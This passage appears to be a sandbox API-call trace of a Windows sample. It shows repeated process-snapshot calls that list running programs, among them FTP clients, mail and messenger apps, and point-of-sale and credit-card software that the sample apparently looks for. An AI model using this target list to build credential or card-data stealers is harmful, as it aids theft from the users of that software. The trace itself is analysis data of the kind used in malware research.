lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0197.857] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0197.859] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.861] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.863] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0197.867] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0197.869] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.871] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0197.873] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0197.875] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0197.876] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0197.878] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0197.879] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0197.881] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0197.882] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0197.884] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0197.888] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0197.889] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0197.891] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0197.892] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0197.894] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0197.895] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0197.897] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0197.899] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0197.900] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0197.958] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0197.959] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0197.961] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0197.962] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0197.966] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0197.968] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0197.969] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0197.971] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0197.973] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0197.974] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0197.976] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0197.978] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0197.983] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0197.985] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0197.986] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0197.988] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0197.990] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0197.992] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0197.994] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0198.078] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0198.080] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0198.082] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0198.085] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0198.087] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0198.091] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0198.094] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0198.096] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0198.098] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0198.101] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0198.103] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0198.108] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0198.112] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0198.114] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0198.115] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0198.117] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0198.119] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0198.144] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0198.147] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0198.149] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0198.151] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0198.156] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0198.157] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0198.159] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0198.161] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0198.163] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0198.164] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0198.166] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0198.171] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0198.174] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.176] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.178] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.180] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0198.232] Process32Next (in: hSnapshot=0x2224, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0198.234] CloseHandle (hObject=0x2224) returned 1 [0198.234] Sleep (dwMilliseconds=0x64) [0198.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0198.414] Process32First (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.416] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.420] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.421] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.422] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.424] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, 